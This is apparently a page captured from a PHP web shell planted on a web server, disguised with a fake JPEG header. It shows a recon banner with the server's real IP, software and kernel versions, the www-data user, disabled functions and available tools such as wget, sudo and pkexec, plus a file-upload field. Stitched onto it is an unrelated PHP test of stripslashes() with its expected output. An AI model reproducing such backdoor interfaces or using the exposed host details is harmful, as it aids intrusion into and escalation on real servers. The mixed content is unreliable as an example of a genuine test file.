????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.137.159.3 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/home/b8009/php-5.6.22/ext/standard/tests/strings/ |
Upload File : |
--TEST-- Test stripslashes() function : usage variations - strings with newline and tab characters --FILE-- <?php /* Prototype : string stripslashes ( string $str ) * Description: Returns an un-quoted string * Source code: ext/standard/string.c */ /* * Test stripslashes() with strings containing newline and tab characters. */ echo "*** Testing stripslashes() : with strings containing newline and tab characters ***\n"; // initialising heredoc strings $heredoc_string_with_newline = <<<EOT This is line 1 \nof 'heredoc' string This is line 2 \nof "heredoc" string EOT; $heredoc_string_with_tab = <<<EOT This is line 1 \tof 'heredoc' string This is line 2 \tof "heredoc" string EOT; // initialising the string array $str_array = array( // string with newline character "\n", "\\n", "Hello \nworld", "Hello \\nworld", '\n', '\\n', 'Hello \nworld', 'Hello \\nworld', $heredoc_string_with_newline, // string with tab character "\t", "\\t", "Hello \tworld", "Hello \\tworld", '\t', '\\t', 'Hello \tworld', 'Hello \\tworld', $heredoc_string_with_tab ); $count = 1; // looping to test for all strings in $str_array foreach( $str_array as $str ) { echo "\n-- Iteration $count --\n"; var_dump( stripslashes($str) ); $count ++; } echo "Done\n"; ?> --EXPECTF-- *** Testing stripslashes() : with strings containing newline and tab characters *** -- Iteration 1 -- string(1) " " -- Iteration 2 -- string(1) "n" -- Iteration 3 -- string(12) "Hello world" -- Iteration 4 -- string(12) "Hello nworld" -- Iteration 5 -- string(1) "n" -- Iteration 6 -- string(1) "n" -- Iteration 7 -- string(12) "Hello nworld" -- Iteration 8 -- string(12) "Hello nworld" -- Iteration 9 -- string(71) "This is line 1 of 'heredoc' string This is line 2 of "heredoc" string" -- Iteration 10 -- string(1) " " -- Iteration 11 -- string(1) "t" -- Iteration 12 -- string(12) "Hello world" -- Iteration 13 -- string(12) "Hello tworld" -- Iteration 14 -- string(1) "t" -- Iteration 15 -- string(1) "t" -- Iteration 16 -- string(12) "Hello tworld" -- Iteration 17 -- string(12) "Hello tworld" -- Iteration 18 -- string(71) "This is line 1 of 'heredoc' string This is line 2 of "heredoc" string" Done